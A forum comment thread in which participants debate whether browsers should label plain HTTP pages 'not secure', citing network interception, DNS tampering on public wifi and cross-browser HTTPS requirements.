It might have if it wasn’t fixed promptly. The Chrome team has implemented the allow-top-navigation-by-user-activation (And my team has implemented this in WebKit, shipping in Safari 12), so that ads cannot do this in the future.
Regardless of this, I don't see why we (and other browsers, since this is universally agreed) can't call plain HTTP "not secure". There are other things we can look at calling "not secure", sure, but why not plain HTTP?
This ignores, again, that the HTTPS requirements are defined in the fetch spec, and have cross-browser agreement. This isn't a thing Chrome has pushed alone.
Labeling them insecure is correct, downranking them in search result is (arguably) incorrect
Security isn't just about what the site collects, though. With bare HTTP, everyone in the middle (like your ISP) has access to your complete browsing history. That can be just as important for an old static site as a new one.
Just a few days ago, I was in a cafe whose wifi provider was deep-inspecting and occasionally altering DNS lookups. (Discovered after some fun debugging) This isn't a random risk.
Wow. What tipped you off to explore further?
A unittest was failing because a bad DNS name was resolving instead of erroring out.
A clear reason to avoid unit testing. :)
In 2004 my Windows laptop was infected by a virus transmitted through the wifi in a hotel I was staying at.
Not if that site has information about, say, Tiananmen Square.
we could call it 'unsecured' ?
I'll have a problem with this if Chrome starts *blocking* HTTP pages. But merely saying (even static) HTTP pages are "Insecure" is entirely accurate. Every page you visit can be logged and modified by any number of unknown third parties. As a user, I deserve to know this.
Just use TOR, it's very simple. Also learn about self sovereign ID tools